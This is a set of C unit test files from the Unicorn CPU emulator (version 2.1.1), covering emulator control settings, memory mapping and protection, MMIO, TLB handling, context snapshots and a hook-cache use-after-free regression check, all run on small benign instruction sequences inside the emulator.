#include "unicorn_test.h" #include <time.h> #include <string.h> // We have to copy this for Android. #ifdef _WIN32 #include "windows.h" #define NANOSECONDS_PER_SECOND 1000000000LL static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { union { uint64_t ll; struct { uint32_t low, high; } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; } static int64_t get_freq(void) { LARGE_INTEGER freq; int ret = QueryPerformanceFrequency(&freq); if (ret == 0) { fprintf(stderr, "Could not calibrate ticks\n"); exit(1); } return freq.QuadPart; } static inline int64_t get_clock_realtime(void) { LARGE_INTEGER ti; QueryPerformanceCounter(&ti); return muldiv64(ti.QuadPart, NANOSECONDS_PER_SECOND, get_freq()); } #else #include <sys/time.h> #include "sys/mman.h" /* get host real time in nanoseconds */ static inline int64_t get_clock_realtime(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); } #endif const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } #define GEN_SIMPLE_READ_TEST(field, ctl_type, arg_type, expected) \ static void test_uc_ctl_##field(void) \ { \ uc_engine *uc; \ arg_type arg; \ OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); \ OK(uc_ctl(uc, UC_CTL_READ(ctl_type, 1), &arg)); \ TEST_CHECK(arg == expected); \ OK(uc_close(uc)); \ } GEN_SIMPLE_READ_TEST(mode, UC_CTL_UC_MODE, int, 4) GEN_SIMPLE_READ_TEST(arch, UC_CTL_UC_ARCH, int, 4) GEN_SIMPLE_READ_TEST(page_size, UC_CTL_UC_PAGE_SIZE, uint32_t, 4096) GEN_SIMPLE_READ_TEST(time_out, UC_CTL_UC_TIMEOUT, uint64_t, 0) static void test_uc_ctl_exits(void) { uc_engine *uc; // cmp eax, 0; // jg lb; // inc eax; // nop; <---- exit1 // lb: // inc ebx; // nop; <---- exit2 char code[] = "\x83\xf8\x00\x7f\x02\x40\x90\x43\x90"; int r_eax; int r_ebx; uint64_t exits[] = {code_start + 6, code_start + 8}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_ctl_exits_enable(uc)); OK(uc_ctl_set_exits(uc, exits, 2)); r_eax = 0; r_ebx = 0; OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx)); // Run two times.
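// With exits enabled, the `until` argument of uc_emu_start is ignored; each run should stop at the first configured exit it reaches (exit1 on the first run, exit2 on the second, hence eax == 1 and ebx == 1 below).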
OK(uc_emu_start(uc, code_start, 0, 0, 0)); OK(uc_emu_start(uc, code_start, 0, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx)); TEST_CHECK(r_eax == 1); TEST_CHECK(r_ebx == 1); OK(uc_close(uc)); } double time_emulation(uc_engine *uc, uint64_t start, uint64_t end) { int64_t t1, t2; t1 = get_clock_realtime(); OK(uc_emu_start(uc, start, end, 0, 0)); t2 = get_clock_realtime(); return t2 - t1; } #define TB_COUNT (8) #define TCG_MAX_INSNS (512) // from tcg.h #define CODE_LEN TB_COUNT *TCG_MAX_INSNS static void test_uc_ctl_tb_cache(void) { uc_engine *uc; char code[CODE_LEN + 1]; double standard, cached, evicted; memset(code, 0x90, CODE_LEN); code[CODE_LEN] = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); standard = time_emulation(uc, code_start, code_start + sizeof(code) - 1); for (int i = 0; i < TB_COUNT; i++) { OK(uc_ctl_request_cache(uc, code_start + i * TCG_MAX_INSNS, NULL)); } cached = time_emulation(uc, code_start, code_start + sizeof(code) - 1); for (int i = 0; i < TB_COUNT; i++) { OK(uc_ctl_remove_cache(uc, code_start + i * TCG_MAX_INSNS, code_start + i * TCG_MAX_INSNS + 1)); } evicted = time_emulation(uc, code_start, code_start + sizeof(code) - 1); // In fact, evicted is also slightly faster than standard, but we don't // guarantee this. TEST_CHECK(cached < standard); TEST_CHECK(evicted > cached); OK(uc_close(uc)); } // Test requires UC_ARCH_ARM. #ifdef UNICORN_HAS_ARM static void test_uc_ctl_change_page_size(void) { uc_engine *uc; uc_engine *uc2; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc2)); OK(uc_ctl_set_page_size(uc, 4096)); OK(uc_mem_map(uc2, 1 << 10, 1 << 10, UC_PROT_ALL)); uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, 1 << 10, 1 << 10, UC_PROT_ALL)); OK(uc_close(uc)); OK(uc_close(uc2)); } #endif // Test requires UC_ARCH_ARM. #ifdef UNICORN_HAS_ARM // Copied from test_arm.c but using the new API. static void test_uc_ctl_arm_cpu(void) { uc_engine *uc; int r_control, r_msp, r_psp; OK(uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_M7)); r_control = 0; // Make sure we are using MSP. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); r_msp = 0x1000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_msp)); r_control = 0b10; // Make the switch. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_psp)); TEST_CHECK(r_psp != r_msp); r_psp = 0x2000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_psp)); r_control = 0; // Switch again OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_msp)); TEST_CHECK(r_psp != r_msp); TEST_CHECK(r_msp == 0x1000); OK(uc_close(uc)); } #endif static void test_uc_hook_cached_cb(uc_engine *uc, uint64_t addr, size_t size, void *user_data) { // Don't add any TEST_CHECK here since we can't refer to the global variable // here. uint64_t *p = (uint64_t *)user_data; (*p)++; return; } static void test_uc_hook_cached_uaf(void) { uc_engine *uc; // "INC ecx; DEC edx; jmp t; t: nop" char code[] = "\x41\x4a\xeb\x00\x90"; uc_hook h; uint64_t count = 0; #ifndef _WIN32 // Apple Silicon does not allow RWX pages.
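// Allocate the callback page as RW first, copy the hook body into it, then flip it to RX with mprotect below, since W^X hosts reject writable-and-executable mappings.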
void *callback = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); TEST_CHECK(callback != (void *)-1); #else void *callback = VirtualAlloc(NULL, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); TEST_CHECK(callback != NULL); #endif memcpy(callback, (void *)test_uc_hook_cached_cb, 4096); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_EXEC) == 0); #endif uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, (void *)callback, (void *)&count, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // Move the hook to the deleted hooks list. OK(uc_hook_del(uc, h)); // This will clear deleted hooks and SHOULD clear cache. OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_WRITE) == 0); #endif memset(callback, 0, 4096); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_EXEC) == 0); #endif // The hook is deleted now; if the cached translation still called the stale pointer, this would trigger a UAF OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(count == 4); OK(uc_close(uc)); #ifndef _WIN32 munmap(callback, 4096); #else VirtualFree(callback, 0, MEM_RELEASE); #endif } static void test_uc_emu_stop_set_ip_callback(uc_engine *uc, uint64_t address, uint32_t size, void *userdata) { uint64_t rip = code_start + 0xb; if (address == code_start + 0x7) { uc_emu_stop(uc); uc_reg_write(uc, UC_X86_REG_RIP, &rip); } } static void test_uc_emu_stop_set_ip(void) { uc_engine *uc; uc_hook h; uint64_t rip; char code[] = "\x48\x31\xc0" // 0x0 xor rax, rax : rax = 0 "\x90" // 0x3 nop : "\x48\xff\xc0" // 0x4 inc rax : rax++ "\x90" // 0x7 nop : <-- going to stop here "\x48\xff\xc0" // 0x8 inc rax : rax++ "\x90" // 0xb nop : "\x0f\x0b" // 0xc ud2 : <-- would raise // UC_ERR_INSN_INVALID, but should never be reached "\x90" // 0xe nop : "\x90"; // 0xf nop : uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_uc_emu_stop_set_ip_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &rip)); TEST_CHECK(rip == code_start + 0xb); OK(uc_close(uc)); } static bool test_tlb_clear_tlb(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { size_t *tlbcount = (size_t *)user_data; *tlbcount += 1; result->paddr = addr; result->perms = UC_PROT_ALL; return true; } static void test_tlb_clear_syscall(uc_engine *uc, void *user_data) { OK(uc_ctl_flush_tlb(uc)); } static void test_tlb_clear(void) { uc_engine *uc; uc_hook hook1, hook2; size_t tlbcount = 0; char code[] = "\xa3\x00\x00\x20\x00\x00\x00\x00\x00\x0f\x05\xa3\x00\x00\x20\x00\x00" "\x00\x00\x00"; // movabs dword ptr [0x200000], eax; syscall; movabs // dword ptr [0x200000], eax uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x200000, 0x1000, UC_PROT_ALL)); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook1, UC_HOOK_TLB_FILL, test_tlb_clear_tlb, &tlbcount, 1, 0)); OK(uc_hook_add(uc, &hook2, UC_HOOK_INSN, test_tlb_clear_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(tlbcount == 4); OK(uc_close(uc)); } static void test_noexec(void) { uc_engine *uc; /* mov al, byte ptr[rip] * nop */ char code[] = "\x8a\x05\x00\x00\x00\x00\x90"; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64,
code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_mem_protect(uc, code_start, code_start + 0x1000, UC_PROT_EXEC)); uc_assert_err( UC_ERR_READ_PROT, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_uc_ctl_mode", test_uc_ctl_mode}, {"test_uc_ctl_page_size", test_uc_ctl_page_size}, {"test_uc_ctl_arch", test_uc_ctl_arch}, {"test_uc_ctl_time_out", test_uc_ctl_time_out}, {"test_uc_ctl_exits", test_uc_ctl_exits}, {"test_uc_ctl_tb_cache", test_uc_ctl_tb_cache}, #ifdef UNICORN_HAS_ARM {"test_uc_ctl_change_page_size", test_uc_ctl_change_page_size}, {"test_uc_ctl_arm_cpu", test_uc_ctl_arm_cpu}, #endif {"test_uc_hook_cached_uaf", test_uc_hook_cached_uaf}, {"test_uc_emu_stop_set_ip", test_uc_emu_stop_set_ip}, {"test_tlb_clear", test_tlb_clear}, {"test_noexec", test_noexec}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_m68k.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_m68k cpu_model) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu_model)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_move_to_sr(void) { uc_engine *uc; char code[] = "\x46\xfc\x27\x00"; // move #$2700,sr int r_sr; uc_common_setup(&uc, UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_M68K_M68000); OK(uc_reg_read(uc, UC_M68K_REG_SR, &r_sr)); r_sr = r_sr | 0x2000; OK(uc_reg_write(uc, UC_M68K_REG_SR, &r_sr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_move_to_sr", test_move_to_sr}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_mem.c
#include "unicorn_test.h" static void test_map_correct(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x40000, 0x1000 * 16, UC_PROT_ALL)); // [0x40000, 0x50000] OK(uc_mem_map(uc, 0x60000, 0x1000 * 16, UC_PROT_ALL)); // [0x60000, 0x70000] OK(uc_mem_map(uc, 0x20000, 0x1000 * 16, UC_PROT_ALL)); // [0x20000, 0x30000] uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x10000, 0x2000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x25000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x35000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x45000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x55000, 0x2000 * 16, UC_PROT_ALL));
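// The holes left between the mapped regions ([0x30000, 0x40000) and [0x50000, 0x60000)) can still be mapped: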
OK(uc_mem_map(uc, 0x35000, 0x5000, UC_PROT_ALL)); OK(uc_mem_map(uc, 0x50000, 0x5000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_map_wrapping(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, (~0ll - 0x4000) & ~0xfff, 0x8000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_mem_protect(void) { uc_engine *qc; int r_eax = 0x2000; int r_esi = 0xdeadbeef; uint32_t mem; // add [eax + 4], esi char code[] = {0x01, 0x70, 0x04}; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &qc)); OK(uc_reg_write(qc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(qc, UC_X86_REG_ESI, &r_esi)); OK(uc_mem_map(qc, 0x1000, 0x1000, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_map(qc, 0x2000, 0x1000, UC_PROT_READ)); OK(uc_mem_protect(qc, 0x2000, 0x1000, UC_PROT_READ | UC_PROT_WRITE)); OK(uc_mem_write(qc, 0x1000, code, sizeof(code))); OK(uc_emu_start(qc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 1)); OK(uc_mem_read(qc, 0x2000 + 4, &mem, 4)); TEST_CHECK(LEINT32(mem) == 0xdeadbeef); OK(uc_close(qc)); } static void test_splitting_mem_unmap(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0x20000, 0x1000, UC_PROT_NONE)); OK(uc_mem_map(uc, 0x21000, 0x2000, UC_PROT_NONE)); OK(uc_mem_unmap(uc, 0x21000, 0x1000)); OK(uc_close(uc)); } static uint64_t test_splitting_mmio_unmap_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); return 0x19260817; } static void test_splitting_mmio_unmap(void) { uc_engine *uc; // mov ecx, [0x3004] <-- normal read // mov ebx, [0x4004] <-- mmio read char code[] = "\x8b\x0d\x04\x30\x00\x00\x8b\x1d\x04\x40\x00\x00"; int r_ecx, r_ebx; int bytes = LEINT32(0xdeadbeef); OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mmio_map(uc, 0x3000, 0x2000, test_splitting_mmio_unmap_read_callback, NULL, NULL, NULL)); // Map a ram area instead OK(uc_mem_unmap(uc, 0x3000, 0x1000)); OK(uc_mem_map(uc, 0x3000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x3004, &bytes, 4)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx)); TEST_CHECK(r_ecx == 0xdeadbeef); TEST_CHECK(r_ebx == 0x19260817); OK(uc_close(uc)); } static void test_mem_protect_map_ptr(void) { uc_engine *uc; uint64_t val = 0x114514; uint8_t *data1 = NULL; uint8_t *data2 = NULL; uint64_t mem; data1 = calloc(sizeof(*data1), 0x4000); data2 = calloc(sizeof(*data2), 0x2000); OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map_ptr(uc, 0x4000, 0x4000, UC_PROT_ALL, data1)); OK(uc_mem_unmap(uc, 0x6000, 0x2000)); OK(uc_mem_map_ptr(uc, 0x6000, 0x2000, UC_PROT_ALL, data2)); OK(uc_mem_write(uc, 0x6004, &val, 8)); OK(uc_mem_protect(uc, 0x6000, 0x1000, UC_PROT_READ)); OK(uc_mem_read(uc, 0x6004, (void *)&mem, 8)); TEST_CHECK(val == mem); OK(uc_close(uc)); free(data2); free(data1); } static void test_map_at_the_end(void) { uc_engine *uc; uint8_t mem[0x1000]; memset(mem, 0xff, 0x100); OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0xfffffffffffff000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0xfffffffffffff000, mem, sizeof(mem))); uc_assert_err(UC_ERR_WRITE_UNMAPPED, uc_mem_write(uc, 0xffffffffffffff00, mem, sizeof(mem))); uc_assert_err(UC_ERR_WRITE_UNMAPPED, uc_mem_write(uc, 0, mem, sizeof(mem))); OK(uc_close(uc)); } static void test_map_wrap(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); 
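// 0xfffffffffffff000 + 0x2000 wraps past the top of the 64-bit address space, so the request below is rejected with UC_ERR_ARG.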
uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, 0xfffffffffffff000, 0x2000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_map_big_memory(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); #if defined(_WIN32) || defined(__WIN32__) || defined(__WINDOWS__) uint64_t requested_size = 0xfffffffffffff000; // assume 4K page size #else long ps = sysconf(_SC_PAGESIZE); uint64_t requested_size = (uint64_t)(-ps); #endif uc_assert_err(UC_ERR_NOMEM, uc_mem_map(uc, 0x0, requested_size, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_mem_protect_remove_exec_callback(uc_engine *uc, uint64_t addr, size_t size, void *data) { uint64_t *p = (uint64_t *)data; (*p)++; OK(uc_mem_protect(uc, 0x2000, 0x1000, UC_PROT_READ)); } static void test_mem_protect_remove_exec(void) { uc_engine *uc; char code[] = "\x90\xeb\x00\x90"; uc_hook hk; uint64_t called_count = 0; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_hook_add(uc, &hk, UC_HOOK_BLOCK, test_mem_protect_remove_exec_callback, (void *)&called_count, 1, 0)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); TEST_CHECK(called_count == 2); OK(uc_close(uc)); } static uint64_t test_mem_protect_mmio_read_cb(struct uc_struct *uc, uint64_t addr, unsigned size, void *user_data) { TEST_CHECK(addr == 0x20); // note, it's not 0x1020 *(uint64_t *)user_data = *(uint64_t *)user_data + 1; return 0x114514; } static void test_mem_protect_mmio_write_cb(struct uc_struct *uc, uint64_t addr, unsigned size, uint64_t data, void *user_data) { TEST_CHECK(false); return; } static void test_mem_protect_mmio(void) { uc_engine *uc; // mov eax, [0x2020]; mov [0x2020], eax char code[] = "\xa1\x20\x20\x00\x00\x00\x00\x00\x00\xa3\x20\x20\x00\x00\x00" "\x00\x00\x00"; uint64_t called = 0; uint64_t r_eax; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x8000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x8000, code, sizeof(code) - 1)); OK(uc_mmio_map(uc, 0x1000, 0x3000, test_mem_protect_mmio_read_cb, (void *)&called, test_mem_protect_mmio_write_cb, (void *)&called)); OK(uc_mem_protect(uc, 0x2000, 0x1000, UC_PROT_READ)); uc_assert_err(UC_ERR_WRITE_PROT, uc_emu_start(uc, 0x8000, 0x8000 + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_eax)); TEST_CHECK(called == 1); TEST_CHECK(r_eax == 0x114514); OK(uc_close(uc)); } static void test_snapshot(void) { uc_engine *uc; uc_context *c0, *c1; uint32_t mem; uint8_t code_data; // mov eax, [0x2020]; inc eax; mov [0x2020], eax char code[] = "\xa1\x20\x20\x00\x00\x00\x00\x00\x00\xff\xc0\xa3\x20\x20\x00" "\x00\x00\x00\x00\x00"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_context_alloc(uc, &c0)); OK(uc_context_alloc(uc, &c1)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); OK(uc_context_save(uc, c0)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_save(uc, c1)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 2); OK(uc_context_restore(uc, c1)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_restore(uc, c0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 0); 
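// The code page at 0x1000 was written before the first snapshot, so restoring c0 leaves its contents intact; the first opcode byte (0xa1) must still be readable.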
OK(uc_mem_read(uc, 0x1000, &code_data, sizeof(code_data))); TEST_CHECK(code_data == 0xa1); OK(uc_context_free(c0)); OK(uc_context_free(c1)); OK(uc_close(uc)); } static bool test_snapshot_with_vtlb_callback(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { result->paddr = addr - 0x400000000; result->perms = UC_PROT_ALL; return true; } static void test_snapshot_with_vtlb(void) { uc_engine *uc; uc_context *c0, *c1; uint32_t mem; uc_hook hook; // mov eax, [0x2020]; inc eax; mov [0x2020], eax char code[] = "\xA1\x20\x20\x00\x00\x04\x00\x00\x00\xFF\xC0\xA3\x20\x20\x00" "\x00\x04\x00\x00\x00"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); // Allocate contexts OK(uc_context_alloc(uc, &c0)); OK(uc_context_alloc(uc, &c1)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY)); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_TLB_FILL, test_snapshot_with_vtlb_callback, NULL, 1, 0)); // Map physical memory OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_EXEC | UC_PROT_READ)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); // Initial context save OK(uc_context_save(uc, c0)); OK(uc_emu_start(uc, 0x400000000 + 0x1000, 0x400000000 + 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_save(uc, c1)); OK(uc_emu_start(uc, 0x400000000 + 0x1000, 0x400000000 + 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 2); OK(uc_context_restore(uc, c1)); // TODO check mem OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_restore(uc, c0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 0); // TODO check mem OK(uc_context_free(c0)); OK(uc_context_free(c1)); OK(uc_close(uc)); } static void test_context_snapshot(void) { uc_engine *uc; uc_context *ctx; uint64_t baseaddr = 0xfffff1000; uint64_t offset = 0x10; uint64_t tmp = 1; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY | UC_CTL_CONTEXT_CPU)); OK(uc_mem_map(uc, baseaddr, 0x1000, UC_PROT_ALL)); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_mem_write(uc, baseaddr + offset, &tmp, sizeof(tmp))); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 1); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 0); tmp = 2; OK(uc_mem_write(uc, baseaddr + offset, &tmp, sizeof(tmp))); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 2); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 0); OK(uc_context_free(ctx)); OK(uc_close(uc)); } static void test_snapshot_unmap(void) { uc_engine *uc; uc_context *ctx; uint64_t tmp; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY | UC_CTL_CONTEXT_CPU)); OK(uc_mem_map(uc, 0x1000, 0x2000, UC_PROT_ALL)); tmp = 1; OK(uc_mem_write(uc, 0x1000, &tmp, sizeof(tmp))); tmp = 2; OK(uc_mem_write(uc, 0x2000, &tmp, sizeof(tmp))); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); uc_assert_err(UC_ERR_ARG, uc_mem_unmap(uc, 0x1000, 0x1000)); OK(uc_mem_unmap(uc, 0x1000, 0x2000)); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_mem_read(uc, 0x1000, &tmp, sizeof(tmp))); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_mem_read(uc, 0x2000, &tmp, sizeof(tmp))); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, 0x1000, &tmp, 
sizeof(tmp))); TEST_CHECK(tmp == 1); OK(uc_mem_read(uc, 0x2000, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 2); OK(uc_context_free(ctx)); OK(uc_close(uc)); } TEST_LIST = {{"test_map_correct", test_map_correct}, {"test_map_wrapping", test_map_wrapping}, {"test_mem_protect", test_mem_protect}, {"test_splitting_mem_unmap", test_splitting_mem_unmap}, {"test_splitting_mmio_unmap", test_splitting_mmio_unmap}, {"test_mem_protect_map_ptr", test_mem_protect_map_ptr}, {"test_map_at_the_end", test_map_at_the_end}, {"test_map_wrap", test_map_wrap}, {"test_map_big_memory", test_map_big_memory}, {"test_mem_protect_remove_exec", test_mem_protect_remove_exec}, {"test_mem_protect_mmio", test_mem_protect_mmio}, {"test_snapshot", test_snapshot}, {"test_snapshot_with_vtlb", test_snapshot_with_vtlb}, {"test_context_snapshot", test_context_snapshot}, {"test_snapshot_unmap", test_snapshot_unmap}, {NULL, NULL}};
unicorn-2.1.1/tests/unit/test_mips.c
